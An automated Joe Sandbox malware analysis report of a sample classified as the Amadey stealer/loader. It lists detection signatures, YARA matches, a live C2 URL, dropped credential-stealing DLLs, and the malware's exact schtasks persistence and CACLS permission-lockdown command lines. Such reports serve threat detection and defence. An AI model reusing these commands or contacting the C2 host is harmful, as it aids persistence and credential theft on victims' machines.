Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:764030
MD5:2365cd5930c2845769177b920d4b8ad6
SHA1:1246c7f15b215bf1ecc70294434ccd19a1778daf
SHA256:77bfc0f4bf45082fc3c52c3c10d4394d925c116fda4b3eda7f09151a57ad4010
Tags:exe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to steal Instant Messenger accounts or passwords
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 204 cmdline: C:\Users\user\Desktop\file.exe MD5: 2365CD5930C2845769177B920D4B8AD6)
    • gntuud.exe (PID: 3332 cmdline: "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" MD5: 2365CD5930C2845769177B920D4B8AD6)
      • schtasks.exe (PID: 1496 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 1372 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cacls.exe (PID: 6060 cmdline: CACLS "gntuud.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • cacls.exe (PID: 4692 cmdline: CACLS "gntuud.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • cmd.exe (PID: 5256 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cacls.exe (PID: 5024 cmdline: CACLS "..\9c69749b54" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • cacls.exe (PID: 1312 cmdline: CACLS "..\9c69749b54" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
      • rundll32.exe (PID: 1276 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • gntuud.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe MD5: 2365CD5930C2845769177B920D4B8AD6)
  • cleanup
{"C2 url": "31.41.244.237/jg94cVd30f/index.php", "Version": "3.50"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
    • 0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
    • 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
    • 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
    • 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
    • 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
    • 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb
    • 0x190dc:$s4: \HostName
    • 0x19104:$s5: \Password
    • 0x17c08:$s6: SOFTWARE\RealVNC\
    • 0x17c34:$s6: SOFTWARE\RealVNC\
    • 0x17c60:$s6: SOFTWARE\RealVNC\
    • 0x17ca8:$s6: SOFTWARE\RealVNC\
    • 0x17cd4:$s6: SOFTWARE\RealVNC\
    • 0x1800c:$s7: SOFTWARE\TightVNC\
    • 0x18038:$s7: SOFTWARE\TightVNC\
    • 0x18064:$s7: SOFTWARE\TightVNC\
    • 0x180b0:$s7: SOFTWARE\TightVNC\
    • 0x1c43c:$s8: cred.dll
    C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
      • 0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      • 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      • 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb
      • 0x190dc:$s4: \HostName
      • 0x19104:$s5: \Password
      • 0x17c08:$s6: SOFTWARE\RealVNC\
      • 0x17c34:$s6: SOFTWARE\RealVNC\
      • 0x17c60:$s6: SOFTWARE\RealVNC\
      • 0x17ca8:$s6: SOFTWARE\RealVNC\
      • 0x17cd4:$s6: SOFTWARE\RealVNC\
      • 0x1800c:$s7: SOFTWARE\TightVNC\
      • 0x18038:$s7: SOFTWARE\TightVNC\
      • 0x18064:$s7: SOFTWARE\TightVNC\
      • 0x180b0:$s7: SOFTWARE\TightVNC\
      • 0x1c43c:$s8: cred.dll
      SourceRuleDescriptionAuthorStrings
      00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x1640:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          00000000.00000003.311169503.0000000000650000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            8.3.gntuud.exe.990000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0.2.file.exe.5f0e67.1.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                8.2.gntuud.exe.950e67.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  8.2.gntuud.exe.400000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    1.3.gntuud.exe.2120000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 9 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 31.41.244.237/jg94cVd30f/index.phpAvira URL Cloud: Label: malware
                      Source: http://31.41.244.237/jg94cVd30f/index.phpMAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                      Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllReversingLabs: Detection: 88%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllVirustotal: Detection: 76%Perma Link
                      Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dllReversingLabs: Detection: 88%
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeJoe Sandbox ML: detected
                      Source: 8.2.gntuud.exe.950e67.1.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "31.41.244.237/jg94cVd30f/index.php", "Version": "3.50"}

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gntuud.exe, gntuud.exe, 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, gntuud.exe, 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, gntuud.exe, 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 2C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00420C88 FindFirstFileExW,0_2_00420C88
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00420C88 FindFirstFileExW,8_2_00420C88
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00970EEF FindFirstFileExW,8_2_00970EEF

                      Networking

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.244.237 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80Jump to behavior
                      Source: Malware configuration extractorURLs: 31.41.244.237/jg94cVd30f/index.php
                      Source: Joe Sandbox ViewASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU
                      Source: Joe Sandbox ViewIP Address: 31.41.244.237 31.41.244.237
                      Source: gntuud.exe, 00000001.00000003.359344808.00000000006A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.237/jg94cVd30f/index.phpM
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004041F0 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004041F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402C70 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,0_2_00402C70
                      Source: file.exe, 00000000.00000002.314289798.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary

                      barindex
                      Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                      Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004295600_2_00429560
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042857D0_2_0042857D
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004076A00_2_004076A0
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00406F308_2_00406F30
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_004295608_2_00429560
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0042857D8_2_0042857D
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_009797C78_2_009797C7
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00418D20 appears 40 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00417040 appears 130 times
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: String function: 00968F87 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: String function: 00418D20 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: String function: 00417040 appears 130 times
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess Stats: CPU usage > 98%
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll C7D804E8FB096769B0E199102BDF8EFA97DFAE1A9B57A479819971146877368B
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe"
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:R" /E
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /FJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&ExitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, MainJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /EJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:R" /EJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeFile created: C:\Users\user\AppData\Roaming\85f469ce401df1Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\9c69749b54Jump to behavior
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@24/9@0/2
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E466E CreateToolhelp32Snapshot,Module32First,0_2_006E466E
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeMutant created: \Sessions\1\BaseNamedObjects\85f469ce401df19fc5a7f9408bc52f06
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_01
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gntuud.exe, gntuud.exe, 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, gntuud.exe, 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, gntuud.exe, 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 2C:\lexakezuraj_yamimumowur45 rex.pdb source: file.exe, gntuud.exe.0.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.sapara:R;.dinol:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418D66 push ecx; ret 0_2_00418D79
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E518A pushfd ; ret 0_2_006E518B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6BFB push ecx; iretd 0_2_006E6C05
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6B88 push edi; ret 0_2_006E6B89
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7E70 push ss; retf 0_2_006E7E71
                      Source: file.exeStatic PE information: section name: .sapara
                      Source: file.exeStatic PE information: section name: .dinol
                      Source: gntuud.exe.0.drStatic PE information: section name: .sapara
                      Source: gntuud.exe.0.drStatic PE information: section name: .dinol
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeFile created: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dllJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
